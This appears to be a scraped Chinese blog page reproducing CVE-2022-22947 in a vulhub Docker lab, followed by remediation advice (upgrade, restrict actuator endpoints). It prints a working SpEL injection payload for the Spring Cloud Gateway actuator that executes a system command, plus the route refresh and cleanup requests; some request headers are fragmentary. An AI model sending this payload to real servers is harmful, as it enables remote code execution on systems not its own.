Spring-Cloud-Gateway-CVE-2022-22947漏洞复现--688IT编程网

Spring-Cloud-Gateway-CVE-2022-22947漏洞复现

⽬录

漏洞描述

Spring Cloud Gateway 远程代码执⾏漏洞（CVE-2022-22947）发⽣在Spring Cloud Gateway应⽤程序的Actuator端点，其在启⽤、公开和不安全的情况下容易受到代码注⼊的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执⾏任意远程执⾏的请求

影响版本

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway < 3.0.7

漏洞复现

环境搭建

1. dokcer pull vulhub/spring-cloud-gateway:3.1.0

2. docker run -itd -p 5000:8080 --name spring vulhub/spring-cloud-gateway:

3.1.0

3. 最后访问ip:5000

过程

1. 添加⼀个spel表达式的路由，数据包如下

Accept:*/*

Connection: close

cve漏洞库

Accept-Language: en

Content-Type: application/json

Content-Length: 364

{

"id": "xd",

"filters": [{

"name": "AddResponseHeader",

"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime( ).exec(new String[]{\"whoami\"}).getInputStream()))}"}

}],

"uri": "example",

"order": 0

}

2. 触发路由⽣效，数据包如下

POST /actuator/gateway/refresh HTTP/1.1

Host: localhost:5000

User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Accept-Encoding: gzip, deflate

Accept:*/*

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

3. 查看执⾏结果，数据包如下

Accept:*/*

Connection: close

Content-Type: application/x-www-form-urlencoded

4. 清理路由，数据包如下

DELETE /actuator/gateway/routes/xd HTTP/1.1

Host: localhost:5000

User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept-Encoding: gzip, deflate

Accept:*/*

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

5. 重复2，使清除路由⽣效

批量url检测

漏洞修复

1. 升级到安全版本

2. 修改Spring配置，禁⽌访问Spring Cloud Gateway actuator端点

发表评论

688IT编程网

Spring-Cloud-Gateway-CVE-2022-22947漏洞复现

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

688IT编程网

Spring-Cloud-Gateway-CVE-2022-22947漏洞复现

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林 的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

随机森林的算法